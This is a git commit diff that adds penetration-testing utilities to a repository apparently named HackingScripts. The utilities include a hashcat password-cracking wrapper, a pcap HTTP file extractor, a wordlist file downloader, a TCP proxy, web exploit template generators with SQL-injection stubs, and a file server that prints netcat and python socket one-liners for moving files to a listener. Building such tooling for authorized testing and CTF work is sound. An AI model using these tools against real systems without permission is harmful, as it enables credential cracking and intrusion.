Repository restructuring

This commit is contained in:
2026-04-30 19:53:18 +02:00
parent 31af1f4423
commit f233fe8264
98 changed files with 4216 additions and 1392 deletions

100
tools/misc/crack_hash.py Executable file
View File

@@ -0,0 +1,100 @@
#!/usr/bin/env python
import os
import sys
import subprocess
import json
import tempfile
from name_that_hash import runner
def load_cracked_hashes():
potfile_path = os.path.join(os.path.expanduser("~"), ".hashcat", "hashcat.potfile")
cracked_hashes = { }
if os.path.isfile(potfile_path):
with open(potfile_path, "r") as f:
for line in f:
hash, password = line.strip().rsplit(":",1)
cracked_hashes[hash] = password
return cracked_hashes
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: %s <file>" % sys.argv[0])
exit(1)
hashes = filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])
potfile = load_cracked_hashes()
if potfile:
uncracked_hashes = []
for hash in hashes:
password = potfile.get(hash, potfile.get(hash.rsplit(":", 1)[0], None))
if password:
print(f"Potfile: {hash}: {password}")
else:
uncracked_hashes.append(hash)
else:
uncracked_hashes = hashes
hashes = json.loads(runner.api_return_hashes_as_json(uncracked_hashes))
wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2]
hash_types = { }
for hash, types in hashes.items():
for t in types:
hash_id = t["hashcat"]
if hash_id is None:
continue
salted = ":" in hash
if salted != t["extended"]:
continue
if hash_id not in hash_types:
hash_types[hash_id] = { "name": t["name"], "hashes": {hash} }
else:
hash_types[hash_id]["hashes"].add(hash)
if len(hash_types) > 0:
uncracked_types = list(hash_types.keys())
num_types = len(uncracked_types)
if num_types > 1:
print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:")
print()
i = 0
for hash_id, hash_type in hash_types.items():
name = (hash_type["name"] + ": ").ljust(max(len(x["name"]) for x in hash_types.values()) + 2)
count = len(hash_type["hashes"])
index = (f"{i}. ").ljust(len(str(num_types - 1)) + 2)
print(f"{index}{name}{count} hashe(s)")
i += 1
# Ask user…
selected = None
while selected is None or selected < 0 or selected >= num_types:
try:
selected = int(input("Your Choice: ").strip())
if selected >= 0 and selected < num_types:
break
except Exception as e:
if type(e) in [EOFError, KeyboardInterrupt]:
print()
exit()
print("Invalid input")
selected_type = uncracked_types[selected]
else:
selected_type = uncracked_types[0]
fp = tempfile.NamedTemporaryFile()
for hash in hash_types[selected_type]["hashes"]:
fp.write(b"%s\n" % hash.encode("UTF-8"))
fp.flush()
proc = subprocess.Popen(["hashcat", "-m", str(selected_type), "-a", "0", fp.name, wordlist] + sys.argv[2:])
proc.wait()
fp.close()
else:
print("No uncracked hashes left")

185
tools/misc/find_git_commit.py Executable file
View File

@@ -0,0 +1,185 @@
#!/usr/bin/env python3
import argparse
import re
import os
import tempfile
import subprocess
import collections
import shutil
import hashlib
import datetime
PROC_ENV = { "LC_ALL": "C" }
def run_cmd(cmd, dir=None, raw=False):
proc = subprocess.Popen(cmd, cwd=dir, env=PROC_ENV, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out = b"".join(proc.communicate())
if not raw:
out = out.decode().strip()
exit_code = proc.returncode
return exit_code, out
def check_git_dir(dir):
exit_code, out = run_cmd(["git", "status"], dir)
if "not a git repository" in out:
print("[-] Given directory is not a git repository.")
return False
elif "Your branch is up to date" not in out \
or "nothing to commit, working tree clean" not in out:
print("[-] Git repository is not in a clean state, please reset it to HEAD")
return False
elif exit_code != 0:
print("[-] Error checking given directory:", out)
return False
else:
return True
def git_clone(dir, url):
print(f"[ ] Cloning {url} to {dir}")
exit_code, out = run_cmd(["git", "clone", url, dir, "-q"])
if exit_code != 0:
print("[-] Error cloing git repository:")
print(out)
return False
return True
def check_input_dir(dir):
if not os.path.isdir(dir):
print("[-] Invalid directory:", dir)
return False
if os.path.isdir(os.path.join(dir, ".git")):
print("[-] Directory to check should not be a git repository")
return False
valid_files = []
real_root = os.path.realpath(dir)
for root, subdirs, files in os.walk(dir):
for file in files:
full_path = os.path.realpath(os.path.join(root, file))
file_size = os.path.getsize(full_path)
if file_size > 0:
relative_path = full_path[len(real_root) + 1:]
valid_files.append(relative_path)
if len(valid_files) == 0:
print("[-] Given directory does not contain any non-empty files")
return False
return valid_files
def get_commits_for_file(file, git_dir):
cmd = ["git","log","--no-color", "--pretty=format:%H %at", "--all","--", file]
exit_code, out = run_cmd(cmd, git_dir)
if exit_code != 0:
print("[-] git-log failed:", out)
return None
else:
lines = out.split("\n")
commits = collections.OrderedDict()
for line in lines:
if line:
data = line.split(" ")
hash, ts = line.split(" ")
commits[hash] = int(ts)
return commits
def hash(data, alg):
h = hashlib.new(alg)
h.update(data)
return h.hexdigest()
def read_file(file):
with open(file, "rb") as f:
return f.read()
def find_newest_commit(git_dir, file_name, sha1hash, md5hash, commits):
for commit_hash in reversed(commits.keys()):
cmd = ["git", "show", f"{commit_hash}:{file_name}"]
exit_code, out = run_cmd(cmd, git_dir, raw=True)
if exit_code != 0:
print("[-] git-show failed:", out)
return None
elif sha1hash == hash(out, "sha1") and md5hash == hash(out, "md5"):
return commit_hash
return None
def get_commit_message(dir, commit_hash):
cmd = ["git","log","--no-color", "--pretty=format:%B", "-n1", commit_hash]
exit_code, out = run_cmd(cmd, dir)
if exit_code != 0:
print("[-] git-log failed:", out)
return None
else:
return out
def run(files, root_dir, git_dir):
latest_commit = None
latest_ts = None
for f in files:
commits = get_commits_for_file(f, git_dir)
if commits:
print(f"[+] {f} found in git history")
sha1hash = hash(read_file(os.path.join(root_dir, f)), "sha1")
md5hash = hash(read_file(os.path.join(root_dir, f)), "md5")
found_commit = find_newest_commit(git_dir, f, sha1hash, md5hash, commits)
if found_commit:
print(f"[+] Commit {found_commit} matches")
if latest_commit is None or commits[found_commit] > latest_ts:
latest_commit = found_commit
latest_ts = commits[found_commit]
else:
print(f"[-] {f} not found in git history")
if latest_commit is None:
print("[-] No matching commit found")
else:
title = get_commit_message(git_dir, latest_commit)
formatted_dt = datetime.datetime.fromtimestamp(latest_ts).strftime("%A, %d. %B %Y %I:%M%p")
print(f"[+] Commit might be: {latest_commit}, {formatted_dt}, {title}")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
dest="dir",
help="The directory containing downloaded files"
)
parser.add_argument(
dest="git",
help="URL or path to git repository to compare to"
)
parser.add_argument(
"-n",
"--no-delete",
dest="nodelete",
action="store_true",
help="Don't delete the git directory after cloning"
)
is_remote_git = False
args = parser.parse_args()
git_dir = args.git
if re.match("^(git|https?)://.*", args.git) or \
(len(args.git.split(":")) == 2 and "@" in args.git.split(":")[0]):
git_dir = tempfile.TemporaryDirectory(suffix=".git").name
is_remote_git = True
if not git_clone(git_dir, args.git):
exit(1)
if check_git_dir(git_dir):
valid_files = check_input_dir(args.dir)
if valid_files != False:
run(valid_files, args.dir, git_dir)
if is_remote_git and not args.nodelete:
shutil.rmtree(git_dir)

362
tools/misc/pcap_file_extract.py Executable file
View File

@@ -0,0 +1,362 @@
#!/bin/python
import argparse
import os
import re
from abc import ABC, abstractmethod
from scapy.all import *
from hackingscripts import util
from collections import OrderedDict
class HttpPacket(ABC):
def __init__(self, sock_src, version):
self.version = version
self.headers = util.CaseInsensitiveDict()
self.payload = None
self.socket = sock_src
@staticmethod
def parse(sock_src, data):
index = data.index(b"\r\n")
first_line = data[0:index+2].decode()
matches_req = re.match(HttpRequest.PATTERN.decode(), first_line)
matches_res = re.match(HttpResponse.PATTERN.decode(), first_line)
if matches_req:
http_packet = HttpRequest(sock_src, *matches_req.groups())
elif matches_res:
http_packet = HttpResponse(sock_src, *matches_res.groups())
else:
return None
header_end = data.index(b"\r\n\r\n")
header_buffer = data[index+2:header_end+2].decode()
http_packet.payload = data[header_end+4:]
for line in re.findall("([^:]+):\s?(.*)\r\n", header_buffer):
http_packet.headers[line[0]] = line[1]
return http_packet
@abstractmethod
def get_file_path(self):
pass
class HttpRequest(HttpPacket):
PATTERN = b"([A-Z]+) ([^ ]+) HTTP/([0-9.]+)\r\n"
def __init__(self, socket, method, uri, version):
super().__init__(socket, version)
self.method = method
self.uri = uri
def __repr__(self):
return f"{self.method} {self.uri} HTTP/{self.version}, payload=" + util.human_readable_size(len(self.payload))
def get_file_path(self):
return self.uri
class HttpResponse(HttpPacket):
PATTERN = b"HTTP/([0-9.]+) ([0-9]+) (.*)\r\n"
def __init__(self, socket, version, status_code, status_text):
super().__init__(socket, version)
self.status_code = int(status_code)
self.status_text = status_text
self.response_to = None
def get_file_path(self):
content_disposition = self.headers.get("Content-Disposition", None)
if content_disposition:
matches = re.findall(";\s*filename=\"?(.*)\"?(;|$)", content_disposition)
if matches:
return matches[0][0]
if self.response_to:
return self.response_to.get_file_path()
return None
def __repr__(self):
return f"HTTP/{self.version} {self.status_code} {self.status_text}, payload=" + util.human_readable_size(len(self.payload))
class PacketIterator:
def __init__(self, connection):
self.connection = connection
self.index = 0
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.has_more():
packet = self.connection.packets[self.index]
self.index += 1
return packet
else:
raise StopIteration
def peek(self):
return None if not self.has_more() else self.connection.packets[self.index]
def pop(self):
packet = self.peek()
if packet:
self.index += 1
return packet
def find_packet(self, pattern, sock_src=None):
for packet in self.connection.packets[self.index:]:
self.index += 1
tcp_packet = packet[TCP]
ip_hdr = packet[IP]
packet_src = f"{ip_hdr.src}:{tcp_packet.sport}"
if sock_src is not None and packet_src != sock_src:
continue
payload = bytes(tcp_packet.payload)
match = re.findall(pattern, payload)
if match:
return packet, match[0], packet_src
return None
def has_more(self):
return self.index < len(self.connection.packets)
class TcpConnection:
def __init__(self, sock_a, sock_b):
self.sock_a = sock_a
self.sock_b = sock_b
self.packets = []
self._payload_size = 0
def add_packet(self, packet):
self.packets.append(packet)
self._payload_size += len(packet[TCP].payload)
def get_key(self):
return TcpConnections._format_key(self.sock_a, self.sock_b)
def iterator(self):
return PacketIterator(self)
def get_other_sock(self, sock):
return self.sock_a if sock == self.sock_b else self.sock_b
def __repr__(self):
return f"{self.get_key()}: {len(self.packets)} packets, {util.human_readable_size(self._payload_size)}"
class TcpConnections:
def __init__(self):
self.connections = OrderedDict()
def __contains__(self, item: TcpConnection):
return str(item) in self.connections
def add(self, element: TcpConnection):
self.connections[str(element)] = element
def __getitem__(self, item: TcpConnection):
return self.connections[str(item)]
def __iter__(self):
return iter(self.connections.values())
@staticmethod
def _format_key(sock_a, sock_b):
return f"{sock_a}<->{sock_b}" if sock_a < sock_b else f"{sock_b}<->{sock_a}"
def get_connection(self, sock_a, sock_b):
key = self._format_key(sock_a, sock_b)
return self.connections[key]
def add_packet(self, sock_src, sock_dst, packet):
key = self._format_key(sock_src, sock_dst)
if key not in self.connections:
self.connections[key] = TcpConnection(sock_src, sock_dst)
self.connections[key].add_packet(packet)
return self.connections[key]
class PcapExtractor:
def __init__(self, pcap_path, output_dir="extracted_files/", filters=None):
self.pcap_path = pcap_path
self.output_dir = output_dir
self.filters = filters if filters is not None else []
self._packets = None
def _open_file(self):
self._packets = rdpcap(self.pcap_path)
def extract_all(self):
self._open_file()
http_packets = self._parse_http_packets()
filtered_packets = self._apply_filters(http_packets)
for packet in filtered_packets:
if len(packet.payload) > 0:
file_path = packet.get_file_path()
with open(os.path.join(self.output_dir, file_path.replace("/", "_")), "wb") as f:
f.write(packet.payload)
print(f"[+] Extracted: {file_path} {util.human_readable_size(len(packet.payload))} Bytes")
def __iter__(self):
self._open_file()
http_packets = self._parse_http_packets()
self.iter_filtered_packets = self._apply_filters(http_packets)
return iter(self.iter_filtered_packets)
def __next__(self):
return next(self.iter_filtered_packets)
def _apply_filters(self, packets):
filtered_packets = packets
for f in self.filters:
filtered_packets = filter(f, filtered_packets)
return list(filtered_packets)
def list(self):
self._open_file()
http_packets = self._parse_http_packets()
filtered_packets = self._apply_filters(http_packets)
for packet in filtered_packets:
print(packet)
def get_http_packet(self, packet_iterator, sock_src, initial_packet):
http_buffer = raw(initial_packet[TCP].payload)
prev_seq = initial_packet[TCP].seq
buff = None
while packet_iterator.has_more():
next_packet = packet_iterator.peek()
if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
next_packet = packet_iterator.pop()
if buff is not None:
# if there is a buffered package, and the seq. number was not reused
if buff[0] != next_packet[TCP].seq:
# append this to output
http_buffer += buff[1]
buff = None
payload_len = len(next_packet[TCP].payload)
if next_packet[TCP].seq - prev_seq != payload_len and payload_len == 1:
buff = (next_packet[TCP].seq, raw(next_packet[TCP].payload))
# potential TCP ZeroWindowProbe
continue
# TODO: instead of assertions, we should make sure, the seq. is ascending
assert next_packet[TCP].seq > prev_seq
assert next_packet[IP].frag == 0
http_buffer += raw(next_packet[TCP].payload)
prev_seq = next_packet[TCP].seq
else:
break
return HttpPacket.parse(sock_src, http_buffer)
def _parse_http_packets(self):
connections = TcpConnections()
for packet in self._packets:
if TCP not in packet:
continue
ip_hdr = packet[IP]
tcp_packet = packet[TCP]
if len(tcp_packet.payload) == 0:
continue
sock_src = f"{ip_hdr.src}:{tcp_packet.sport}"
sock_dst = f"{ip_hdr.dst}:{tcp_packet.dport}"
connections.add_packet(sock_src, sock_dst, packet)
http_packets = []
for connection in connections:
packet_iterator = connection.iterator()
while packet_iterator.has_more():
request = packet_iterator.find_packet(HttpRequest.PATTERN)
if not request:
continue
packet, match, sock_src = request
method = match[0].decode()
file_name = match[1].decode().rsplit("?")[0]
http_request_packet = self.get_http_packet(packet_iterator, sock_src, packet)
http_packets.append(http_request_packet)
other_sock = connection.get_other_sock(sock_src)
response = packet_iterator.find_packet(HttpResponse.PATTERN, sock_src=other_sock)
if not response:
continue
packet, match, sock_src = response
status_code = match[1].decode()
http_response_packet = self.get_http_packet(packet_iterator, sock_src, packet)
http_response_packet.response_to = http_request_packet
http_packets.append(http_response_packet)
return http_packets
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to pcap file to extract files from")
parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
dest="output_dir")
parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
parser.add_argument("-e", "--extract", help="Extract files (default)", default=False, action="store_true")
parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
default="101,304,403,404", dest="exclude_codes")
parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
default="", dest="include_codes")
parser.add_argument("-fe", "--file-extensions", help="File extensions, e.g. txt,exe,pdf", type=str,
default="", dest="file_extensions")
parser.add_argument("-fn", "--file-name", help="File name, e.g. passwords.txt", type=str,
default="", dest="file_name")
parser.add_argument("-fp", "--file-path", help="File path (uri), e.g. /admin/index.html", type=str,
default="", dest="file_path")
# TODO: ports, ip_addresses...
args = parser.parse_args()
filters = [
lambda p: not isinstance(p, HttpResponse) or p.status_code not in [int(x) for x in args.exclude_codes.split(",")],
]
if args.include_codes:
filters.append(lambda p: not isinstance(p, HttpResponse) or p.status_code in [int(x) for x in args.include_codes.split(",")])
if args.file_extensions:
filters.append(lambda p: os.path.splitext(p.file_name)[1] in args.file_extensions.split(","))
if args.file_name:
filters.append(lambda p: os.path.basename(p.get_file_path()) == args.file_name)
if args.file_path:
filters.append(lambda p: p.get_file_path() == args.file_path)
pcap_path = args.file
if not os.path.isfile(pcap_path):
print("[-] File not found or not a file:", pcap_path)
exit(1)
output_dir = args.output_dir
if not os.path.isdir(output_dir):
os.makedirs(output_dir, exist_ok=True)
if not os.path.isdir(output_dir):
print("[-] Output directory is not a directory or does not exist and could not be created:", output_dir)
exit(2)
pcap_extractor = PcapExtractor(pcap_path, output_dir, filters)
if args.list and args.extract:
print("[-] Can only specify one of list or extract, not both")
exit(3)
elif args.list:
pcap_extractor.list()
else:
pcap_extractor.extract_all()

View File

@@ -0,0 +1,78 @@
#!/usr/bin/python3
import argparse
import urllib
import requests
import os
import pathlib
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def download_files(url, root_directory, wordlist, verbose=False):
root_directory = str(pathlib.Path(root_directory).resolve())
for w in wordlist:
rel_directory = os.path.dirname(w)
dest_directory = os.path.join(root_directory, rel_directory)
if not str(pathlib.Path(dest_directory).resolve()).startswith(root_directory):
print("[!] Path outside the root directory:", w)
continue
res = requests.get(url + w, verify=False, allow_redirects=False)
if res.status_code == 200:
if not os.path.isdir(dest_directory):
os.makedirs(dest_directory, exist_ok=True)
with open(os.path.join(root_directory, w), "wb") as f:
f.write(res.content)
print(f"[+] {url}{w}: {len(res.content)} Bytes")
elif verbose:
print(f"[-] {url}{w}: {res.status_code} {res.reason}")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
dest="dir",
help="The destination directory"
)
parser.add_argument(
dest="url",
help="The URL prefix"
)
parser.add_argument(
dest="wordlist",
help="The wordlist containing all uris"
)
parser.add_argument(
"-v", "--verbose",
action="store_true",
help="Verbose mode",
default=False
)
args = parser.parse_args()
uris = set()
with open(args.wordlist, "r") as f:
for line in f:
w = line.strip()
while w.startswith("/"):
w = w[1:]
if w:
uris.add(w)
if len(uris) == 0:
print("[!] List does not contain any URIs")
exit()
dest_directory = args.dir
if not os.path.isdir(dest_directory):
if not os.mkdir(dest_directory):
print("[!] Destination directory does not exist and could not be created")
exit()
url = args.url
if not url.endswith("/"):
url += "/"
download_files(url, dest_directory, uris, args.verbose)

118
tools/misc/tcp_template.py Normal file
View File

@@ -0,0 +1,118 @@
#!/usr/bin/env python
import re
import sys
import json
import argparse
import urllib.parse
def generate_template(listen_address, listen_port, remote_host, remote_port):
# we could all need that
imports = [
"os",
"socket",
"threading"
]
partial_imports = {
"hackingscripts.utils": ["util"],
"hackingscripts.utils.packeter": ["Packer", "Parser"]
}
imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
return f"""#!/usr/bin/env python
#
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
#
{imports}
BUFFER_SIZE = 4096
class Packet:
def __init__(self):
pass
@staticmethod
def from_data(data):
packet = Packet()
parser = Parser(data)
# TODO: auto-generated method stub
return packet
def pack(self):
buf = Packer()
# TODO: auto-generated method stub
return buf.get()
def forward(source, destination):
try:
while True:
data = source.recv(BUFFER_SIZE)
if not data:
break
# TODO: Parse / Manipulate packet
# packet = Packet.from_data(data)
# repacked = packet.pack()
destination.sendall(data)
except Exception:
pass
finally:
source.close()
destination.close()
def handle_client(client_socket, remote_host, remote_port):
try:
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host, remote_port))
except Exception as e:
print(f"Failed to connect to remote: {{e}}")
client_socket.close()
return
# Start bidirectional forwarding
threading.Thread(target=forward, args=(client_socket, remote_socket), daemon=True).start()
threading.Thread(target=forward, args=(remote_socket, client_socket), daemon=True).start()
def start_proxy(local_host, local_port, remote_host, remote_port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((local_host, local_port))
server.listen(100)
print(f"[*] Forwarding from {{local_host}}:{{local_port}} to {{remote_host}}:{{remote_port}}")
while True:
client_socket, addr = server.accept()
print(f"[+] Connection from {{addr[0]}}:{{addr[1]}}")
threading.Thread(
target=handle_client,
args=(client_socket, remote_host, remote_port),
daemon=True
).start()
if __name__ == "__main__":
start_proxy({repr(listen_address)}, {listen_port}, {repr(remote_host)}, {remote_port})
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Exploit Template for tcp application attacks",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument("la", type=str, help="Listen Address")
parser.add_argument("lp", type=int, help="Listen Port", choices=range(1,65535+1))
parser.add_argument("rh", type=str, help="Remote Host")
parser.add_argument("rp", type=int, help="Remote Port", choices=range(1,65535+1))
args = parser.parse_args()
template = generate_template(args.la, args.lp, args.rh, args.rp)
print(template)

53
tools/misc/upload_file.py Executable file
View File

@@ -0,0 +1,53 @@
#!/usr/bin/python
import sys
import os
import argparse
from hackingscripts.utils import util
def serve_file(listen_sock, path, forever=False):
try:
while True:
print('[ ] Waiting for a connection')
connection, client_address = listen_sock.accept()
try:
print('[+] Connection from', client_address)
with open(path, "rb") as f:
content = f.read()
connection.sendall(content)
print("[+] File Transfer succeeded")
finally:
connection.close()
if not forever:
break
finally:
listen_sock.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="File Transfer using netcat")
parser.add_argument("--port", type=int, required=False, default=None, help="Listening port")
parser.add_argument(type=str, dest="path", help="Path to the file you wish to upload")
args = parser.parse_args()
path = args.path
if not os.path.isfile(path):
print("[-] File not found:", path)
exit(1)
address = util.get_address()
listen_sock = util.open_server(address, args.port)
if not listen_sock:
exit(1)
print("[+] Now listening, download file using:")
print('nc %s %d > %s' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
print('python -c \'import socket;sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0);sock.connect(("%s",%d));sock.sendall(open("%s","rb").read())\'' % (address, listen_sock.getsockname()[1], os.path.basename(path)))
print()
serve_file(listen_sock, path, forever=True)

209
tools/misc/web_template.py Executable file
View File

@@ -0,0 +1,209 @@
#!/usr/bin/env python
import re
import sys
import json
import argparse
import urllib.parse
def generate_template(base_url, features):
# we could all need that
imports = [
"os", "io", "re", "sys",
"json", "time", "base64", "requests",
"subprocess", "urllib.parse"
]
partial_imports = {
"bs4": ["BeautifulSoup"],
"hackingscripts.utils": ["util"],
"hackingscripts.tools.exploits": ["rev_shell"],
"urllib3.exceptions": ["InsecureRequestWarning"]
}
main_code = []
methods = []
ip_address_arg = next(filter(lambda f: re.match(r"ip_address=(.*)", f), features), None)
ip_address = "util.get_address()" if not ip_address_arg else "'" + ip_address_arg[1] + "'"
variables = {
"IP_ADDRESS": ip_address,
"BASE_URL": f'"{base_url}" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"'
}
proxy_arg = next(filter(lambda f: re.match(r"proxy=(.*)", f), features), None)
if proxy_arg or "burp" in features:
proxy_url = "http://127.0.0.1:8080" if not proxy_arg else proxy_arg[1]
variables["PROXIES"] = json.dumps({"http": proxy_url, "https": proxy_url})
proxy = """
if \"proxies\" not in kwargs:
kwargs[\"proxies\"] = PROXIES
"""
else:
proxy = ""
if "vhost" in features or "subdomain" in features:
url_parts = urllib.parse.urlparse(base_url)
host_name = url_parts.netloc
variables["HOST_NAME"] = f"'{host_name}' if \"LOCAL\" not in sys.argv else \"127.0.0.1:1337\""
vhost_param = ", vhost=None"
full_url = f"f'{url_parts.scheme}://{{vhost}}.{{HOST_NAME}}{{uri}}' if vhost else BASE_URL + uri"
else:
vhost_param = ""
full_url = "BASE_URL + uri"
methods.insert(0, f"""def request(method, uri{vhost_param}, **kwargs):
if not uri.startswith("/") and uri != "":
uri = "/" + uri
client = requests
if "session" in kwargs:
client = kwargs["session"]
del kwargs["session"]
if "allow_redirects" not in kwargs:
kwargs["allow_redirects"] = False
if "verify" not in kwargs:
kwargs["verify"] = False
{proxy}
url = {full_url}
return client.request(method, url, **kwargs)
""")
if "register" in features or "account" in features:
main_code.append("""if not register(USERNAME, PASSWORD):
exit(1)
""")
variables["USERNAME"] = '"Blindhero"'
variables["PASSWORD"] = '"test1234"'
methods.append("""
def register(username, password):
res = request("POST", "/register", data={"username": username, "password": password})
if res.status_code != 200:
print("[-] Error registering")
exit()
return True
""")
if "login" in features or "account" in features:
main_code.append("""session = login(USERNAME, PASSWORD)
if not session:
exit(1)
""")
variables["USERNAME"] = '"username"'
variables["PASSWORD"] = '"password"'
methods.append("""
def login(username, password):
session = requests.Session()
res = request("POST", "/login", data={"username": username, "password": password}, session=session)
if res.status_code != 200:
print("[-] Error logging in")
exit()
return session
""")
if "sqli" in features:
partial_imports["hackingscripts.sqli"] = ["MySQLi", "PostgreSQLi", "BlindSQLi", "ReflectedSQLi"]
methods.append("""
class ReflectedSQLiPoC(MySQLi, ReflectedSQLi):
def __init__(self):
# TODO: specify reflected columns with their types
super().__init__([None, str, int])
def reflected_sqli(self, columns: list, table=None, condition=None, offset=None, verbose=False):
# TODO: build query and extract columns from response
return None
""")
methods.append("""
class BlindSQLiPoC(MySQLi, BlindSQLi):
def blind_sqli(self, condition: str, verbose=False) -> bool:
# TODO: build query and evaluate condition
return False
""")
main_code.append("""poc = ReflectedSQLiPoC()
print(poc.get_current_user())
""")
if "http-server" in features or "file-server" in features:
partial_imports["hackingscripts.fileserver"] = ["HttpFileServer"]
main_code.append("""file_server = HttpFileServer("0.0.0.0", 3000)
file_server.enableLogging()
file_server.addRoute("/dynamic", on_request)
file_server.addFile("/static", b"static-content")
file_server.startBackground()
""")
methods.append("""
def on_request(req):
# TODO: auto generated method stub
return 200, b"", { "X-Custom-Header": "1" }
""")
if len(main_code) == 0:
main_code = ["pass"]
main = f"""
if __name__ == "__main__":
{'\n '.join(main_code)}
"""
imports = "\n".join(f"import {i}" for i in sorted(imports, key=len))
imports += "\n" + "\n".join(sorted(list(f"from {p} import {', '.join(i)}" for p, i in partial_imports.items()), key=len))
variables = "\n".join(f"{k} = {v}" for k, v in variables.items())
header = f"""#!/usr/bin/env python
#
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY {' '.join(sys.argv)}
# For more information, visit: https://git.romanh.de/Roman/HackingScripts
#
{imports}
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
{variables}
"""
return header + "".join(methods) + main
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Exploit Template for web attacks",
formatter_class=argparse.RawTextHelpFormatter
)
available_features = [
"ip_address=[...]: Local IP-Address for reverse connections",
"burp|proxy=[...]: Tunnel traffic through a given proxy or Burp defaults",
"subdomain|vhost: Allow to specify a subdomain for outgoing requests",
"register|account: Generate an account registration method stub",
"login|account: Generate an account login method stub",
"sqli: Generate an template SQL-Injection class",
"http-server|file-server: Generate code for starting an in-memory http server"
]
parser.add_argument("url", type=str, help="Target URL")
parser.add_argument(
"-f",
"--features",
nargs="*",
type=str,
default=[],
help="Optional list of features:\n- " + "\n- ".join(available_features)
)
args = parser.parse_args()
url = args.url
if "://" not in url:
url = "http://" + url
features = args.features
template = generate_template(url, features)
print(template)